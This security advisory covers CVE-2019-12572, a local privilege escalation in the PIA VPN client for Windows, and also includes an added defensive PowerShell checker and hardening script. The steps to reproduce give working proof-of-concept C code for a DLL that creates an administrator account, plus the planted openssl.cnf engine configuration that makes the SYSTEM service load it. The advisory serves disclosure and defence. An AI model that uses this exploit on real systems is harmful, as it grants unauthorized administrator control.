Allele Security Alert
ASA-2019-00377
Identifier(s)
ASA-2019-00377, CVE-2019-12572
Title
Privilege Escalation due to malicious OpenSSL engine
Vendor(s)
London Trust Media, Inc
Product(s)
Private Internet Access (PIA) VPN Client for Windows
Affected version(s)
Private Internet Access (PIA) VPN Client for Windows version 1.0.2 (build 02363)
Fixed version(s)
Private Internet Access (PIA) VPN Client for Windows version v1.2.1
Proof of concept
Yes
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client 1.0.2 (build 02363) for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privilege.
Technical details
On startup the PIA Windows service (pia-service.exe) loads the OpenSSL library from C:\Program Files\Private Internet Access\libeay32.dll. This library attempts to load the configuration file c:\etc\ssl\openssl.cnf, which does not exist on a default install. By default on Windows systems, authenticated users can create directories under c:\, so a low privileged user can create c:\etc\ssl\openssl.cnf and point its engine section at a DLL of their choosing. OpenSSL loads the engine with LoadLibrary, so the DLL's DllMain runs as soon as the library is mapped, regardless of whether the DLL actually exports the engine entry points OpenSSL looks for next; the result is arbitrary code execution as SYSTEM when the service starts. The compiled-in c:\etc\ssl search path is the insecure Windows default that OpenSSL later addressed as CVE-2019-1552 (see references).
Steps to reproduce
Note: All steps are executed using a low privileged account.
1) Create the c:\etc\ssl directory
mkdir c:\etc\ssl
2) Create a malicious engine library named woot.dll that creates an administrator account named woot when loaded.
/* Cross compile with: x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared */
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Runs when the SYSTEM-level service maps the DLL as an OpenSSL engine. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        /* Executes as SYSTEM: create a local account and add it to Administrators. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        /* Do thread-specific initialization. */
        break;
    case DLL_THREAD_DETACH:
        /* Do thread-specific cleanup. */
        break;
    case DLL_PROCESS_DETACH:
        /* Perform any necessary cleanup. */
        break;
    }
    return TRUE; /* Successful DLL_PROCESS_ATTACH. */
}
3) Copy the malicious woot.dll file into the c:\etc\ssl folder.
copy woot.dll c:\etc\ssl
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
5) Reboot the system, because a low privileged user does not have permission to restart the service.
6) After the reboot has completed, log in and open a command shell. At this point the “woot” administrator account will exist.
net user woot
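As an added example (not from the advisory, from the researcher, or from PIA/London Trust Media), the PowerShell script below checks a host for the conditions the steps above depend on: a user-creatable drive root, an existing c:\etc\ssl or openssl.cnf and who owns it, and any dynamic_path engine DLLs the configuration references. With the -Harden switch it pre-creates c:\etc and c:\etc\ssl with an Administrators/SYSTEM-only ACL so a standard user can no longer plant a configuration there. The function names, the -Harden switch and the default paths are this example's own assumptions; the c:\etc\ssl search path and the libeay32.dll location are taken from the advisory text.

```powershell
<#
  Added example, not part of the original advisory or of PIA's code.
  Checks a Windows host for the condition the PoC relies on (an OpenSSL
  build that searches a user-creatable OPENSSLDIR) and, with -Harden,
  pins that directory to an Administrators/SYSTEM-only ACL.
  Assumption: OPENSSLDIR is C:\etc\ssl, as the advisory states for the
  PIA 1.0.2 build of libeay32.dll. Run from an elevated PowerShell.
#>
param(
    [string]$OpenSslDir = 'C:\etc\ssl',
    [string]$LibPath    = 'C:\Program Files\Private Internet Access\libeay32.dll',
    [switch]$Harden
)

$script:LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')  # Everyone, Authenticated Users, Users
$CreateDirs = [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories  # AppendData, 0x4

function Test-LowPrivCanCreateDirectory {
    # $true when Everyone/Authenticated Users/Users hold an Allow ACE on $Path
    # that includes CreateDirectories (the default on C:\, which the PoC needs).
    param([string]$Path)
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # orphaned or unresolvable identity
        if ($script:LowPrivSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $CreateDirs) -ne 0) { return $true }
    }
    return $false
}

function Get-OpenSslEngineDllPaths {
    # Returns every dynamic_path value in an openssl.cnf, the setting the PoC
    # uses to pull in woot.dll. Handles plain "key = value" lines only.
    param([string]$ConfPath)
    if (-not (Test-Path -LiteralPath $ConfPath)) { return @() }
    @(Get-Content -LiteralPath $ConfPath | ForEach-Object {
        if ($_ -match '^\s*dynamic_path\s*=\s*(.+?)\s*$') { $Matches[1] }
    })
}

function Protect-Directory {
    # Creates $Path if needed and replaces its ACL with FullControl for
    # Administrators and SYSTEM only, inheritance disabled, so the service
    # still finds the directory but only admins can write into it.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        New-Item -ItemType Directory -Path $Path -Force | Out-Null
    }
    $sec = New-Object System.Security.AccessControl.DirectorySecurity
    $sec.SetAccessRuleProtection($true, $false)   # stop inheriting the permissive C:\ ACL
    foreach ($sidString in 'S-1-5-32-544', 'S-1-5-18') {   # BUILTIN\Administrators, NT AUTHORITY\SYSTEM
        $sid  = New-Object System.Security.Principal.SecurityIdentifier($sidString)
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
            $sid, 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Allow')
        $sec.AddAccessRule($rule)
    }
    Set-Acl -LiteralPath $Path -AclObject $sec
}

$confPath = Join-Path $OpenSslDir 'openssl.cnf'
$parent   = Split-Path -Parent $OpenSslDir                  # C:\etc, also creatable by any user
$root     = [System.IO.Path]::GetPathRoot($OpenSslDir)      # C:\

$findings = [ordered]@{
    'affected library present'              = Test-Path -LiteralPath $LibPath
    "low-priv users can mkdir under $root"  = Test-LowPrivCanCreateDirectory -Path $root
    "$OpenSslDir exists"                    = Test-Path -LiteralPath $OpenSslDir
    "$confPath exists"                      = Test-Path -LiteralPath $confPath
    'engine DLLs referenced by openssl.cnf' = ((Get-OpenSslEngineDllPaths -ConfPath $confPath) -join '; ')
}
if (Test-Path -LiteralPath $LibPath) {
    $findings['libeay32.dll file version'] = (Get-Item -LiteralPath $LibPath).VersionInfo.FileVersion
}
if (Test-Path -LiteralPath $OpenSslDir) {
    # A directory owned by an ordinary user account is the squatting pattern from the PoC.
    $findings["$OpenSslDir owner"] = (Get-Acl -LiteralPath $OpenSslDir).Owner
}
$findings.GetEnumerator() | ForEach-Object { '{0,-45} {1}' -f $_.Key, $_.Value }

if ($Harden) {
    # Pin the parent as well as the leaf: FullControl on C:\etc (which CREATOR OWNER
    # gets on a directory it made) includes DeleteSubdirectoriesAndFiles, so a user
    # who owns C:\etc could otherwise rename the protected ssl directory away.
    Protect-Directory -Path $parent
    Protect-Directory -Path $OpenSslDir
    'Hardened {0} and {1}; this is a mitigation, not a substitute for updating the client.' -f $parent, $OpenSslDir
}
```

Run it elevated; the report alone needs no changes to the host, and -Harden only pre-creates and locks the two directories. Treat an existing c:\etc or c:\etc\ssl owned by a non-admin account, or an openssl.cnf that references a dynamic_path outside the OpenSSL install, as evidence to investigate before resetting the ACL. The hardening closes the directory squatting path but does not change the library's compiled-in search path; updating to the fixed client version listed above is the actual fix.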
Credits
Rich Mirch
Reference(s)
PIA Windows Privilege Escalation: Malicious OpenSSL engine
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12572.txt
CVE-2019-12572 PIA Windows Privilege Escalation: Malicious OpenSSL Engine
https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
ASA-2019-00477 – OpenSSL: Windows builds with insecure path defaults
https://allelesecurity.com/asa-2019-00477/
Windows builds with insecure path defaults (CVE-2019-1552)
https://www.openssl.org/news/secadv/20190730.txt
CVE-2019-12572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12572
CVE-2019-12572
https://nvd.nist.gov/vuln/detail/CVE-2019-12572
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: July 30, 2019